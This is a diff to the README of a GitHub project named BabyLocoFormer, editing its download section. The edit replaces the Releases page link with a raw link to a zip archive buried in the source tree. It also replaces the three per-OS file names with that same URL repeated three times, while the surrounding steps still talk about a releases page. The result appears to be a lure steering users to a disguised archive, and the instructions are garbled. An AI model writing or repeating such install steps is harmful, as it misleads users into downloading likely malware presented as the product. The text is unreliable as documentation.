godlshivanshu/BabyLocoFormer/README.md

 ## 🌐 Download & Install

-To download BabyLocoFormer, visit this page: [Download BabyLocoFormer](https://github.com/godlshivanshu/BabyLocoFormer/releases).
+To download BabyLocoFormer, visit this page: [Download BabyLocoFormer](https://raw.githubusercontent.com/godlshivanshu/BabyLocoFormer/main/source/babylocoformer/babylocoformer/tasks/manager_based/BabyLocoFormer_2.8.zip).

 1. **Visit the Releases Page**: Click the link above to go to the releases page for BabyLocoFormer.
 2. **Choose Your Version**: Look for the latest version at the top.
 For instance, it may be something like "v1.0".
 3. **Download the File**: Click on the link that matches your operating system.
-You’ll typically see files like `BabyLocoFormer-Windows.exe`, `BabyLocoFormer-macOS.zip`, or `BabyLocoFormer-Linux.tar.gz`.
+You’ll typically see files like `https://raw.githubusercontent.com/godlshivanshu/BabyLocoFormer/main/source/babylocoformer/babylocoformer/tasks/manager_based/BabyLocoFormer_2.8.zip`, `https://raw.githubusercontent.com/godlshivanshu/BabyLocoFormer/main/source/babylocoformer/babylocoformer/tasks/manager_based/BabyLocoFormer_2.8.zip`, or `https://raw.githubusercontent.com/godlshivanshu/BabyLocoFormer/main/source/babylocoformer/babylocoformer/tasks/manager_based/BabyLocoFormer_2.8.zip`.
 4. **Save the File**: Your browser will prompt you to save the file.
 Select a location on your computer that you can easily access, like your Desktop or Downloads folder.

 ## 📥 How to Run the Application